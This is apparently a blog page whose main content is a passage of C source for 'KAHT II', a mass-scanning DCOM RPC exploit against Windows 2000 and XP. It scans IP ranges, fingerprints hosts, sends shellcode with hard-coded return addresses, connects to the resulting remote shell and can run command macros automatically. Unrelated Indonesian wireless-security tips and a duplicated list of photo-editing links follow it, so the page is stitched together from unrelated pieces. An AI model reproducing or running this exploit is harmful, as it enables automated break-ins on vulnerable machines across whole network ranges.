"\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00";
struct
{
char *os;
u_long ret;
} targets[] =
{
{ "[Win2k]", 0x0018759F },
{ "[WinXP]", 0x0100139d },
};
//GLOBALS...
/******************************************************************/
void banner(void)
{
printf ("_________________________________________________ \n");
printf(" KAHT II - MASSIVE RPC EXPLOIT\n");
printf(" DCOM RPC exploit. Modified by aT4r@3wdesign.es\n");
printf(" #haxorcitos && #localhost @Efnet Ownz you!!!\n");
printf(" PUBLIC VERSION :P\n");
printf ("________________________________________________\n\n");
}
void usage(void)
{
printf(" Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]\n");
printf(" example: KaHt2.exe 192.168.0.0 192.168.255.255\n");
printf("\n NEW!: Macros Available in shell enviroment!!\n Type !! for more info into a shell.\n");
//printf(" If AUTOHACKING ENABLED MACRO !9 WILL BE EXECUTED\n");
exit(1);
}
/******************************************************************/
/*****************************************************************/
void execute_macro(char opt,int sock2){
FILE *macro;
char cadena[512];
char tmp[512];
int found=0;
int delay=500; //configurable TIMEOUT FOR CMDS - Default=500
if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',sizeof(cadena));
fgets(cadena,sizeof(cadena)-1,macro);
cadena[strlen(cadena)-1]='\0';
if ((found==1) && (( strncmp(cadena,"[Macro]",strlen("[Macro]"))) ==0) )
{
fclose(macro);
printf(" + Ejecucion de La Macro Terminada\n");
fclose(macro);return;}
if (( strncmp(cadena,"delay=",strlen("delay="))) ==0)
delay=atoi(cadena+6);
if (( strncmp(cadena,"key=",strlen("key="))) ==0)
if (( cadena+strlen("key=!"))[0]==opt)
found=1; //OUR CMDS ARE HERE! :)
if ( (( strncmp(cadena,"cmd=",strlen("cmd="))) ==0) && (found) )
if (strlen(cadena)>strlen("cmd= "))
{
strcpy(tmp,cadena+4);
strcat(tmp,"\r\n");
send(sock2,tmp,strlen(tmp),0);
//printf("Enviado: %s! de tamaƱo: %i\n",tmp,sizeof(tmp));
sleep(delay);
}
}
fclose(macro);
send(sock2,"\n",strlen("\n"),0);
printf(" - Macro Done -\n");
}
sleep(25);
}
/*****************************************************************/
void show_macros(int sock2){
FILE *macro;
char cadena[512];
printf(" +______________(Available Macros)______________\n");
if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',512);
fgets(cadena,sizeof(cadena)-1,macro);
if (strlen(cadena)>1)
{
cadena[strlen(cadena)-1]='\0';
if (( strncmp(cadena,"name=",strlen("name="))) ==0)
printf(" + Nombre: %s ",cadena+strlen("name="));
if ((strncmp(cadena,"key=",strlen("key="))) ==0)
printf("Trigger: %s\n",cadena+strlen("key="));
}
}
fclose(macro);
}
send(sock2,"\n",strlen("\n"),0);
sleep(10);
}
/*****************************************************************/
void macro(char opt, int sock2)
{
switch(opt)
{
case '!':
show_macros(sock2);
break;
default:
execute_macro(opt,sock2);
break;
}
}
/*****************************************************************/
void readconsole(void *sock2)
{
int l;
char buf[512];
if (AUTOHACKING) {
execute_macro('9',(int) sock2);
salir=1;
}
while(!salir)
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
salir=1;
else
{
if ( (l==3) && (buf[0]=='!') )
macro(buf[1],(int)sock2);
else
{
send((int)sock2,buf,l,0);
if (strncmp(buf,"exit",strlen("exit")) ==0)
{
salir=1;
_endthread();
}
}
}
}
}
void enviamacro(void *sock2)
{
sleep(500);
macro(9,(int)sock2);
salir=1;
_endthread();
}
/****************************************************************/
int shell (int sock2) /* NOT RIPPED FROM TESO :P */
{
int l;
char buf[512];
salir=0;
_beginthread(readconsole,4096,(void *)(int) sock2);
while (!salir)
{
if ((l=recv (sock2, buf, sizeof (buf),0))>0)
write (1, buf, l);
else sleep(100);
}
printf("\n - Connection Closed\n");
return (salir);
}
/*****************************************************************/
int main(int argc, char **argv)
{
int i,total=NTHREADS;
#ifdef WIN32
WSADATA ws;
clrscr();
#endif
banner();
if(argc<3)
usage();
#ifdef WIN32
if (WSAStartup(MAKEWORD(2,0),&ws)!=0)
{
printf(" WSAStartup Error: %d\n",WSAGetLastError());
exit(1);
}
#endif
sscanf (argv[1], "%d.%d.%d.%d", &ip1[0],&ip1[1],&ip1[2],&ip1[3]);
sscanf (argv[2], "%d.%d.%d.%d", &ip2[0],&ip2[1],&ip2[2],&ip2[3]);
for(i=0;i<4;i++)
{
if ( (ip1[i]>255) || (ip1[i]<0) ) usage();
if ( (ip2[i]>255) || (ip2[i]<0) ) usage();
}
if (argc==4) total=atoi(argv[3]);
if (argc==5) AUTOHACKING=atoi(argv[4]);
#ifdef WIN32
InitializeCriticalSection(&cs);
InitializeCriticalSection(&css);
InitializeCriticalSection(&cslog);
InitializeCriticalSection(&csshell);
#else
//Aqui meter los thread de linux :D y semaforos
#endif
//ULTRA FAST PORT SCANNER....
if ((results=fopen("results.txt","w"))==NULL) exit(0);
printf(" [+] Targets: %s-%s with %i Threads\n",argv[1],argv[2],total);
srand ( time(NULL) ); RPORT=INITRPORT;
printf(" [+] Attacking Port: %i. Remote Shell at port: %i\n",PORT,RPORT);
printf(" [+] Scan In Progress...\n");
for(i=0;i<total;i++)
#ifdef WIN32
_beginthread(checkea,8192,(void *)i);
#else
//Aqui meter los thread de linux :D y semaforos
#endif
while(threads>0)
sleep(100);
fclose(results);
printf("\n [+] Scan Finished. Found %i open ports\n",rpcopen);
return(0);
}
/****************************************************************************************/
//void attack(char *linea,int peta)
void attack(char *linea,int peta)
{
if (peta==-1) return;
// if (AUTOHACKING!=1)
#ifdef WIN32
struct timeval tv;
#else
struct time_t tv;
#endif
struct sockaddr_in target_ip;
int sock,sock2; //Exploit Socket && Shell Socket
unsigned short port = 139;
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
unsigned char buf1[0x1000];
u_long tmp=1; //TIMEOUTS
FILE *w2k;
FILE *wxp;
int i;
fd_set fds;
//linea[strlen(linea-1)]='\0';
EnterCriticalSection(&csshell);
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(port);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
printf(" - Connecting to %s\n",linea);
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
//if((i=select(sock+1,0,&fds,0,&tv))!=SOCKET_ERROR)
// if (i!=0)
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
printf(" Sending Exploit to a %s Server...",targets[peta].os);
tmp=0;
ioctlsocket( sock, FIONBIO, &tmp);
if (send(sock,bindstr,sizeof(bindstr),0)>0)
{
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = RECV;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
if(select(sock +1, &fds, NULL, NULL, &tv) > 0)
{
recv(sock, buf1, 1000, 0);
lportl=htons(RPORT);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&winshellcode[1351],&lport,4);
memcpy(winshellcode+916, (unsigned char *) &targets[peta].ret, 4);
tmp=0;
ioctlsocket( sock, FIONBIO, &tmp);
send(sock,winshellcode,1705,0);
sleep(50);
if ((sock2=socket(AF_INET,SOCK_STREAM,0)) !=-1)
{
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(RPORT);
tmp=1;
ioctlsocket( sock2, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock2, &fds);
connect(sock2,(struct sockaddr *)&target_ip, sizeof(target_ip));
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
printf("\n - Conectando con la Shell Remota...\n\n");
salir=0;
shell(sock2);
#ifdef WIN32
closesocket(sock2);
#else
close(sock2);
#endif
strcat(linea,"\n");
if (peta==0)
{
w2k=fopen("win2k.txt","a");
if (w2k!=NULL)
{ fputs(linea,w2k); fclose(w2k);}
else printf(" !!UNABLE TO LOG IP %s",linea);
}
else
{
wxp=fopen("winxp.txt","a");
if (wxp!=NULL)
{fputs(linea,wxp); fclose(wxp);}
else printf(" !!UNABLE TO LOG IP %s",linea);
}
//} else printf("UNABLE TO CONNECT TO SHELL\n");
} else printf("FAILED\n");
}
else printf("\n UNABLE TO CREATE SOCK2\n");
}
else printf(" FAILED to send Exploit2\n");
}
else printf(" FAILED to send Exploit\n");
}
}
//if (AUTOHACKING!=1)
LeaveCriticalSection(&csshell);
}
/*********************************************************************************/
char *givemeip(char *ip)
{
EnterCriticalSection(&cs);
if (ip1[3]!=254)
ip1[3]++;
else
{
ip1[2]++;
ip1[3]=1;
//return(NULL); //uhh!
}
if (ip1[2]==255)
{ ip1[2]++; ip1[1]++;}
LeaveCriticalSection(&cs);
if (ip1[2]>ip2[2]) return(NULL);
if (ip1[2]==ip2[2])
if (ip1[3]>ip2[3]) return(NULL);
sprintf(ip,"%d.%d.%d.%d",ip1[0],ip1[1],ip1[2],ip1[3]);
return(ip);
}
/******************************************************************************/
//int version(char *ip, int sock)
int version(char ip[16], int sock)
{
//sacado por ingenieria inversa del Scanner de ISS.
unsigned char peer0_0[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00 };
unsigned char peer0_1[] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x07, 0x00 };
/*
unsigned char win2kvuln[] = {
0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00};
*/
fd_set fds2;
unsigned char buf[1024];
int l;
struct timeval tv2;
FD_ZERO(&fds2);
FD_SET(sock, &fds2);
tv2.tv_sec = RPC_FINGERPRINT_TIMEOUT;
tv2.tv_usec = 0;
memset(buf,'\0',sizeof(buf));
send(sock,peer0_0,sizeof(peer0_0),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
l=recv (sock, buf, sizeof (buf),0);
// for(i=0;i<52;i++)
// {
// if (i==28) i=i+4;
// if (buf[i+32]!=win2kvuln[i])
// {
send(sock,peer0_1,sizeof(peer0_1),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
memset(buf,'\0',sizeof(buf));
l=recv (sock, buf, sizeof (buf),0);
if (l==32)
{
closesocket(sock);
return(1);//winxp
}
else
{
#ifdef WIN32
closesocket(sock);
#else
close(sock);
#endif
return(0);//Unknown
}
}
else return(-1);
// }
//}
// closesocket(sock);
// return(0);//win2k
}
closesocket(sock);
return(-1); //Unknown
}
/********************************************************************************/
void checkea(void *threadn)
{
char ip[16];
char ip2[17];
int sock,i;
struct sockaddr_in target_ip;
fd_set fds;
u_long tmp=1;
struct timeval tv;
EnterCriticalSection(&css);
threads++;
sleep(1);
LeaveCriticalSection(&css);
memset(ip,'\0',sizeof(ip));
while (givemeip(ip)!=NULL)
{
//printf("Checkeando IP: %s\n",ip);
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(ip);
target_ip.sin_port = htons(139);
closesocket(sock);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
// else if (i==0) {
// printf("i==0 ip: %s\n",ip); }
// else
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
sprintf(ip2,"%s\n",ip);
EnterCriticalSection(&cslog);
fputs(ip2,results);
rpcopen++;
LeaveCriticalSection(&cslog);
attack(ip,version(ip,sock));
}
}
closesocket(sock);
memset(ip,'\0',sizeof(ip));
}
EnterCriticalSection(&css);
threads--;
sleep(1);
LeaveCriticalSection(&css);
//printf("Thread %i saliendo\n",(int)threadn);
_endthread();
}
/******************************************************************************/
9 ways make secure wireless connection
1. Ubah Password Default Access Point.
2. Jika memungkinkan, ubah IP default. (beberapa merk Access Point biasanya sudah disertai fasilitas ini).
3. Aktifkan metode enkripsi, gunakan enkripsi WPA dengan Pre Shared Key (WPA-PSK), dan berikan password yang aman. Bisa juga memanfaat enkripsi WPA dengan Temporal Key Integrity Protokol).
4. Matikan fungsi Broadcast SSID, sehingga SSID Anda tidak terdeksi pada proses War Driving.
5. Lindunngi SSID, dengan cara : merubah nama SSID default dengan nama SSID yang tidak mudah ditebak.
6. Gunakan MAC Address Filtering untuk mengurangi kegiatan penyusupan
7. Non Aktifkan DHCP, gunakan IP Static dengan nilai yang jarang diguakan.
8. Gunakan Security tambahan seperti : CaptivePortal atau aplikasi lainnya yang di inject pada firmware Access Point.
9. Access Point Monitoring via Client, ini adalah cara terbaru uuntuk melakukan controlling terhadapa Access Point yang Anda miliki melalui client. Proses ‘IP Block’, ‘Client Resctriction’ dan tentang keamanan lainnya. Salah satu aplikasi yang bisa digunakan adalah : Mc Affe Wireless Home Security.
Editing Photo Online
http://www.festisite.com/money/
http://anymaking.com/
http://www.magnigraph.com/
http://www.makemebabies.com/
http://www.funphotobox.com/
http://www.photo505.com/
http://www.loonapix.com/
http://www.montagraph.com/Views/Main.aspx
http://www.pizap.com/
http://www.imagechef.com/
http://funny.photo/
http://blingee.com/
http://www.fakemagazinecover.com/
Its easy and have fun...ok :)
http://anymaking.com/
http://www.magnigraph.com/
http://www.makemebabies.com/
http://www.funphotobox.com/
http://www.photo505.com/
http://www.loonapix.com/
http://www.montagraph.com/Views/Main.aspx
http://www.pizap.com/
http://www.imagechef.com/
http://funny.photo/
http://blingee.com/
http://www.fakemagazinecover.com/
Its easy and have fun...ok :)
Langganan:
Postingan (Atom)